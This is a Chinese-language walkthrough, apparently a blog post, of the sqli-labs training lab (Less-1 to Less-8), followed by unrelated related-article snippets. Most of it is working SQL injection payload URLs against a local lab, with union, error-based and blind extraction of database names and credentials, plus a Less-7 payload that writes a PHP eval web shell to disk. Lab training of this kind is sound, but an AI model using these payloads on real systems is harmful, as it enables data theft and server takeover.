这是抄袭你们  铃兰师姐总结的,尽管她很不情愿。

(现在只是第八关,相信她会努力的,一定会做完,我也会随时在这个上面更新的,这个是在本地搭建的,想要这个的可以找你们铃兰师姐要啊!!!)

less-1:

1、获取当前数据库名

http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select database())--+

SELECT * FROM users WHERE id='' union select 1,2,(select database())-- ' LIMIT 0,1

Your Login name:2

Your Password:security

当前数据库名:security

2、获取所有数据库名

?id=' union select 1,2,(select group_concat(schema_name)from information_schema.schemata)--+

SELECT * FROM users WHERE id='' union select 1,2,(select group_concat(schema_name) from information_schema.schemata)-- ' LIMIT 0,1

Your Login name:2

Your Password:information_schema,challenges,info,mysql,news,performance_schema,register,security,text,yuan

所有数据库名:

information_schema,challenges,info,mysql,news,performance_schema,register,security,text,yuan

3、获取表名

http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema = 0x7365637572697479)--+

//0x7365637572697479  为数据库名(security)的16进制形式

SELECT * FROM users WHERE id='' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema = 0x7365637572697479)-- ' LIMIT 0,1

Your Login name:2

Your Password:emails,referers,uagents,users

数据库security中的表名:emails,referers,uagents,users

4、获取列名

http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema = 0x7365637572697479 and table_name=0x7573657273)--+

//0x7573657273 表名:users

SELECT * FROM users WHERE id='' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema =0x7365637572697479 and table_name=0x7573657273)-- ' LIMIT 0,1

Your Login name:2

Your Password:id,username,password

列名:id,username,password

5、获取数据

http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)--+

//0X7c:空格

SELECT * FROM users WHERE id='' union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)-- ' LIMIT 0,1

Your Login name:2

Your Password:1|Dumb|Dumb,2|Angelina|I-kill-you,3|Dummy|p@ssword,4|secure|crappy,5|stupid|stupidity,6|superman|genious,7|batman|mob!le,8|admin|admin,9|admin1|admin1,10|admin2|admin2,11|admin3|admin3,12|dhakkan|dumbo,14|admin4|admin4

数据:1|Dumb|Dumb,2|Angelina|I-kill-you,3|Dummy|p@ssword,4|secure|crappy,5|stupid|stupidity,6|superman|genious,7|batman|mob!le,8|admin|admin,9|admin1|admin1,10|admin2|admin2,11|admin3|admin3,12|dhakkan|dumbo,14|admin4|admin4

6、读取数据库路径/获取安装路径

http://localhost/sqli-labs-master/less-1/?id=0' union select 1,@@datadir,@@basedir--+

Your Login name:D:\wamp\bin\mysql\mysql5.6.12\data\

Your Password:D:/wamp/bin/mysql/mysql5.6.12

数据库路径:D:\wamp\bin\mysql\mysql5.6.12\data\

mysql安装路径:D:/wamp/bin/mysql/mysql5.6.12

Less-2:

1、获取列数:

http://localhost/sqli-labs-master/less-2/?id=1 order by 1,2,3,4--+

SELECT * FROM users WHERE id=1 order by 1,2,3,4-- LIMIT 0,1

Unknown column '4' in 'order clause'

(共有三列)

2、获取数据库名称:

http://localhost/sqli-labs-master/less-2/?id=' ' union select  1,2,(select database())--+

("id="后面为两个单引号)

SELECT * FROM users WHERE id=' ' union select 1,2,(select database())-- LIMIT 0,1

Your Login name:2

Your Password:security

数据库:security

3、获取所有数据库名称:

http://localhost/sqli-labs-master/less-2/?id=' '

SELECT * FROM users WHERE id=' ' union select 1,2,(select group_concat(schema_name)from information_schema.schemata)-- LIMIT 0,1

Your Login name:2 Your Password:information_schema,challenges,info,mysql,news,performance_schema,register,security,text,yuan

所有数据库名称:

information_schema,challenges,info,mysql,news,performance_schema,register,security,text,yuan

4、获取表名称:

http://localhost/sqli-labs-master/less-2/?id=%27%20%27%20union%20select%201,2,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema%20=%200x7365637572697479)--+

SELECT * FROM users WHERE id=' ' union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schema=0x7365637572697479)-- LIMIT 0,1

Your Login name:2

Your Password:emails,referers,uagents,users

表0x7365637572697479(security)中的表有:emails,referers,uagents,users

5、获取列名称:

http://localhost/sqli-labs-master/less-2/?id=%27%20%27%20union%20select%201,2,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_schema=0x7365637572697479%20and%20table_name=0x7573657273)--+

SELECT * FROM users WHERE id=' ' union select 1,2,(select group_concat(column_name)from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273)-- LIMIT 0,1

Your Login name:2

Your Password:id,username,password

数据库security中表users的列名称:id,username,password

6、获取表中数据:

http://localhost/sqli-labs-master/less-2/?id=' ' union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)--+

SELECT * FROM users WHERE id=' ' union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)-- LIMIT 0,1

Your Login name:2

Your Password:1|Dumb|Dumb,2|Angelina|I-kill-you,3|Dummy|p@ssword,4|secure|crappy,5|stupid|stupidity,6|superman|genious,7|batman|mob!le,8|admin|admin,9|admin1|admin1,10|admin2|admin2,11|admin3|admin3,12|dhakkan|dumbo,14|admin4|admin4

Less-3

1.获取列数:

http://localhost/sqli-labs-master/less-3/?id=1') order by 1,2,3,4--+

SELECT * FROM users WHERE id=('1') order by 1,2,3,4-- ') LIMIT 0,1

Unknown column '4' in 'order clause'

2.@@datadir 读取数据库路径;@@basedir  获取mysql安装路径

http://localhost/sqli-labs-master/less-3/?id=0%27)%20union%20select%201,@@datadir,@@basedir--+

之后方法类似less-1和less-2!!!

Less-4

1、获取列数:

http://localhost/sqli-labs-master/less-4/?id=1") order by 1,2,3,4--+

SELECT * FROM users WHERE id=("1") order by 1,2,3,4-- ") LIMIT 0,1

Unknown column '4' in 'order clause'

2、获取数据库名称:

http://localhost/sqli-labs-master/less-4/?id=%22)%20union%20select%20%201,2,(select%20database())--+

3、所有数据库名称:

http://localhost/sqli-labs-master/less-4/?id=%22)union%20select%201,2,(select%20group_concat(schema_name)from%20information_schema.schemata)--+

4、获取表名称:

http://localhost/sqli-labs-master/less-4/?id=%22)union%20select%201,2,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema%20=%200x7365637572697479)--+

5、获取列名:

http://localhost/sqli-labs-master/less-4/?id=%22)%20union%20select%201,2,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_schema=0x7365637572697479%20and%20table_name=0x7573657273)--+

6、获取数据

http://localhost/sqli-labs-master/less-4/?id=%22)%20union%20select%201,2,(select%20group_concat(id,0x7c,username,0x7c,password)%20from%20security.users)--+

Less-5:(二分法)

1.获取列数:

http://localhost/sqli-labs-master/less-5/?id=' order by 4--+

共四列: Unknown column '4' in 'order clause'

2、报错得到数据库的个数:

http://localhost/sqli-labs-master/less-5/?id=1'+and(select 1 from (select count(*),concat((select(select(select concat(0x7e7e3a7e7e,count(distinct table_schema),0x7e7e3a7e7e) from information_schema.tables)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

Duplicate entry '~~:~~11~~:~~1' for key 'group_key'

==>>共十一个数据库

2.报错得到数据库名:

http://localhost/sqli-labs-master/less-5/

?id=1' and (select 1 from (select count(*),concat((select (select (select distinct concat(0x7e7e3a7e7e,table_schema,0x7e7e3a7e7e) from information_schema.tables limit 8,1)) from information_schema.tables limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a)--+

Duplicate entry '~~:~~security~~:~~1' for key 'group_key'

==>第九个数据库名为 security

3.报错得到表名:

首先得到表的个数:

/less-5/?id=1' and (select 1 from (select count(*),concat((select (select(select concat(0x7e7e3a7e7e,count(table_name),0x7e7e3a7e7e)from information_schema.tables where table_schema=0x7365637572697479))from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

==>Duplicate entry '~~:~~4~~:~~1' for key 'group_key'

共有四个表

依次得到表的名字:

?id=1' and (select 1 from (select count(*),concat((select(select(select concat (0x7e7e3a7e7e,table_name,0x7e7e3a7e7e)from information_schema.tables  where table_schema=0x7365637572697479 limit 3,1)) from information_schema.tables limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

Duplicate entry '~~:~~users~~:~~1' for key 'group_key'

2.获取数据库版本号:

http://localhost/sqli-labs-master/less-5/?id=1' and left(version(),1)=5--+

left(string,n)函数:提取字符串string左边的n个字符。

3.利用length()获取数据库长度:

http://localhost/sqli-labs-master/less-5/?id=1' and length(database())=8 --+

数据名长度为8;

4.奇怪:

http://localhost/sqli-labs-master/less-5/?id=1' and length(db())=8 --+

结果:FUNCTION security.db does not exist

5.获取数据库名字:使用二分法获取其各个字母

http://localhost/sqli-labs-master/less-5/?id=1' and left(database(),1) >'s'--+

第一个字母为s;

http://localhost/sqli-labs-master/less-5/?id=1%27%20and%20left(database(),2)%20%3E%27se%27--+

前两个字母为se;

依次类推。。。

6.获取数据库security 数据库的第一表的第一个字符:

首先得出数据库的第一个表的长度:

http://localhost/sqli-labs-master//Less-5/?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>6 --+

长度为6;

/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables  where table_schema=database() limit 0,1),1,1))>101--+

/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables  where table_schema='security' limit 0,1),1,1))>101--+

第一个字母为e;

/Less-5/?id=1' and length(select table_name from information_schema.tables where table_schema =database() limit 0,1)>10--+

Less-7 :

1.创建一个木马文件7.php,连接菜刀(必须知道数据库的用户名和密码),然后管理数据库即可得到数据库内容

http://localhost/sqli-labs-master/less-7/?id=0%27))%20union%20select%201,2,%27%3C?php%20@eval($_POST[%27mima%27]);%20?%3E%27%20into%20outfile%20%27D://Demo//sqli-labs-master/less-7/7.php%27--+

less-8:

盲注需要掌握一些MySQL的相关函数:

length(str):返回str字符串的长度。

substr(str, pos, len):将str从pos位置开始截取len长度的字符进行返回。注意这里的pos位置是从1开始的,不是数组的0开始

mid(str,pos,len):跟上面的一样,截取字符串

ascii(str):返回字符串str的最左面字符的ASCII代码值。

ord(str):同上,返回ascii码

if(a,b,c) :a为条件,a为true,返回b,否则返回c,如if(1>2,1,0),返回0

首先要记得常见的ASCII,A:65,Z:90 a:97,z:122,  0:48, 9:57

首先select database()查询数据库

ascii(substr((select database()),1,1)):返回数据库名称的第一个字母,转化为ascii码

ascii(substr((select database()),1,1))>64:ascii大于64就返回true,if就返回1,否则返回0

ps:(你们铃兰师姐会持续更新的)

sqli-libs的更多相关文章

  1. sqli篇-本着就了解安全本质的想法,尽可能的用通俗易懂的语言去解释安全漏洞问题

    前言 最早接触安全也是从xss攻击和sql注入攻击开始的. 和xss一样屡居OWASPtop10 前三名的漏洞,sqli(sql Injection)sql注入攻击也是web安全中影响较大和影响范围较 ...

  2. 编译gtk+程序报错gcc: pkg-config --cflags --libs gtk+-2.0: 没有那个文件或目录

    第一次接触gtk+.在网上搜罗良一番,装好相应的库后,编写了第一hello程序.在编译时输入以下命令:gcc -o hello hello.c 'pkg-config --cflags --libs ...

  3. Play libs

    The play.libs package contains several useful libraries that will help you to achieve common program ...

  4. Android中libs目录下armeabi和armeabi-v7a的区别

    armeabi默认选项,支持基于 ARM* v5TE 的设备支持软浮点运算(不支持硬件辅助的浮点计算)支持所有 ARM* 设备 armeabi-v7a支持基于 ARM* v7 的设备支持硬件 FPU ...

  5. SQLi filter evasion cheat sheet (MySQL)

    This week I presented my experiences in SQLi filter evasion techniques that I have gained during 3 y ...

  6. python INFO: Can't locate Tcl/Tk libs and/or headers

    安装opencv的时候遇到这个错误: python INFO: Can't locate Tcl/Tk libs and/or headers 参考如下文章解决这个问题: http://www.ver ...

  7. 如何为libs目录下的jar包关联源代码

    以前,我们可以为lib目录下的jar包关联源代码,但是现在似乎不行了. 下面是一篇讲述此问题解决方法的文章: How to attach javadoc or sources to jars in l ...

  8. Makefile选项CFLAGS,LDFLAGS,LIBS

    CFLAGS 表示用于 C 编译器的选项, CXXFLAGS 表示用于 C++ 编译器的选项.这两个变量实际上涵盖了编译和汇编两个步骤. CFLAGS: 指定头文件(.h文件)的路径,如:CFLAGS ...

  9. Android studio libs目录

    Android studio libs目录: 关于Android studio libs目录,Android studio 已经为我们自动生成了,如果默认 是看不到默认Libs目录的,点击红色按钮地方 ...

  10. 写你自己 android 多通道打包工具 可以包libs和.so文件

    android上传应用程序,需要区分各个信道. 通常更改配置文件中的一个通道id,假设有多个通道,手动更改并生成apk这将是非常麻烦的,及增加误差的概率. 在这个课堂上分享一个打包工具.也可在网上类似 ...

随机推荐

  1. scala配置intellij IDEA15.0.3环境及hello world!

    1. Intellij IDEA Scala开发环境搭建 Intellij IDEA 15.0.3 默认配置里面没有Scala插件,需要手动安装,在Intellij IDEA 15.0.3 第一次运行 ...

  2. asp.net mvc webapi 实用的接口加密方法

    在很多项目中,因为webapi是对外开放的,这个时候,我们就要得考虑接口交换数据的安全性. 安全机制也比较多,如andriod与webapi 交换数据的时候,可以走双向证书方法,但是开发成本比较大, ...

  3. 用Python来实现列举某个文件夹内所有的文件列表

    用Python来实现列举某个文件夹内所有的文件列表.吾八哥我动手写代码之前分析了下,遍历一个文件夹,肯定是需要用到os模块了,查阅模块帮助信息,可知os.listdir()方法可以列举某个文件夹内的所 ...

  4. CMD(SA400 Command)

    一.CMD模糊查询: 命令行键入:CRT,WRK,ADD,CPY,DSP,CHG,CLR,FND,RTV*等. 二.CMD分类查询: 命令行键入:GO CMD xxx eg:GO CMD FILE,G ...

  5. ALSA和Pulseaudio

    小记一下,Deadbeef如果使用ALSA作为音频输出的话,会导致其他说有使用pulseaudio的程序[如Chrome]没声音.....[但是SMplayer使用ALSA的话不会...]

  6. Android 自定义View实现QQ运动积分抽奖转盘

    因为偶尔关注QQ运动, 看到QQ运动的积分抽奖界面比较有意思,所以就尝试用自定义View实现了下,原本想通过开发者选项查看下界面的一些信息,后来发现积分抽奖界面是在WebView中展示的,应该是在H5 ...

  7. VC++6.0在win8.1系统下运行失败的解决办法

    在win8.1系统下安装了VC++6,.0编译软件之后,发现打不开.出现下面的错误: 解决办法: 安装文件目录:Microsoft Visual Studio--common--MSDev98--Bi ...

  8. 使用Identity Server 4建立Authorization Server (1)

    预备知识: http://www.cnblogs.com/cgzl/p/7746496.html 本文内容基本完全来自于Identity Server 4官方文档: https://identitys ...

  9. Paint the Grid Reloaded(缩点,DFS+BFS)

    Leo has a grid with N rows and M columns. All cells are painted with either black or white initially ...

  10. hdu 2089 不要62(入门数位dp)

    不要62 Time Limit: 1000/1000 MS (Java/Others)    Memory Limit: 32768/32768 K (Java/Others)Total Submis ...